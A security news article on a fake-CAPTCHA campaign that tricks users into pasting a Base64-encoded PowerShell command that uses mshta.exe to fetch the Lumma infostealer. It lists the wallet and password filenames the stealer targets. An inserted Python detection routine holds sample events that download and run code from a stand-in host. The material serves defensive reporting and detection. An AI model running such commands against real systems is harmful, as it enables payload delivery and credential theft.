Prove you’re not a robot by running malware: crooks delivering stealers with fake CAPTCHAs


Would you fall for a CAPTCHA that asks you to go and delete the System32 folder? Threat actors are successfully using malicious bot detection prompts to drop the notorious infostealer Lumma.

Researchers at Qualys, a security firm, have discovered a new malicious campaign. Threat actors are leveraging CAPTCHAs, asking users to “Verify You Are Human” by running a malicious command prompt, which downloads malware.

To trick users, the prompt disguises its malicious intent by automatically copying the malicious script to the system's clipboard and asking users to paste it into the terminal window. To the victim, it looks like they just press five keys to complete the verification, but that is enough to launch the terminal and run the code.


No files are involved, which makes this threat both deceptive and persistent. The execution chain leads to the download of the Lumma infostealer, which collects user data and files such as passwords and crypto wallets and exfiltrates them to a cybercriminal-controlled server.

[Image: malicious CAPTCHA prompt]

“Users are redirected to these fake CAPTCHA sites by bad actors exploiting legit software or public-facing applications. When the user clicks the ‘I’m not a robot’ button, verification steps are presented. Completing these steps triggers the execution of a PowerShell command,” Qualys researchers speculate.

The malicious script on the compromised web pages is encoded with Base64, making it harder to detect.

As an intermediary, the attackers use the trusted Windows tool mshta.exe to download a remote payload.
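As an added example (not code from the article or from Qualys), the following Python triage routine runs over constructed process-creation events of the kind EDR or Sysmon telemetry would provide and flags the two stages just described: PowerShell started with a Base64-encoded command, and mshta.exe invoked with a remote URL. The event fields, the `.invalid` domain and the encoded string are all assumptions made for the example.

```python
import base64
import re

# Constructed sample process-creation events standing in for EDR/Sysmon telemetry.
# The encoded PowerShell line is built here from a harmless placeholder string.
_ENCODED = base64.b64encode(
    "Start-Process mshta.exe 'https://cdn.example.invalid/verify'".encode("utf-16le")
).decode("ascii")

SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -w hidden -enc {_ENCODED}"},
    {"parent": "powershell.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://cdn.example.invalid/verify"},
    {"parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p"},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the value is Base64 of UTF-16LE.
_ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
_REMOTE = re.compile(r"https?://", re.I)

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None if absent/undecodable."""
    match = _ENC_FLAG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Return the reasons an event matches the fake-CAPTCHA chain (empty list if none)."""
    reasons = []
    image, cmdline = event["image"].lower(), event["cmdline"]
    if image.endswith("mshta.exe") and _REMOTE.search(cmdline):
        reasons.append("mshta.exe invoked with a remote URL")
    if image.endswith("powershell.exe"):
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            reasons.append("PowerShell launched with a Base64-encoded command")
            if "mshta" in decoded.lower() or _REMOTE.search(decoded):
                reasons.append("decoded command stages a remote payload via mshta")
    return reasons

def triage(events):
    """Return (index, reasons) for every event that raised at least one reason."""
    hits = []
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits.append((i, reasons))
    return hits
```

Decoding the encoded argument before matching is what lets the rule catch the chain even when the visible command line shows nothing but Base64.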

[Image: Lumma attack chain]

Lumma Stealer is one of the most capable and widespread malware-as-a-service offerings, specializing in stealing sensitive data. The malware searches various directories on the compromised system for files and data related to cryptocurrency and for password text files.

“It specifically looks for files having keywords that suggest they may hold confidential information, such as *seed*.txt, *pass*.txt, *.kbdx, *ledger*.txt, *trezor*.txt, *metamask*.txt, bitcoin*.txt, *word*, *wallet*.txt,” the researchers noted.


The malware and its command-and-control servers are often hosted on legitimate Content Delivery Networks (CDNs). In this campaign, the attackers relied on the Cloudflare CDN.

The investigation shows Lumma's ability to adapt and evade detection by abusing common tools and by relying on embedded payloads and process injection. Previously, Lumma Stealer was delivered via fake Chrome error messages, breached YouTube accounts, and even adult toys.

Qualys suggests using endpoint detection and response (EDR) tools to prevent and stop the attack.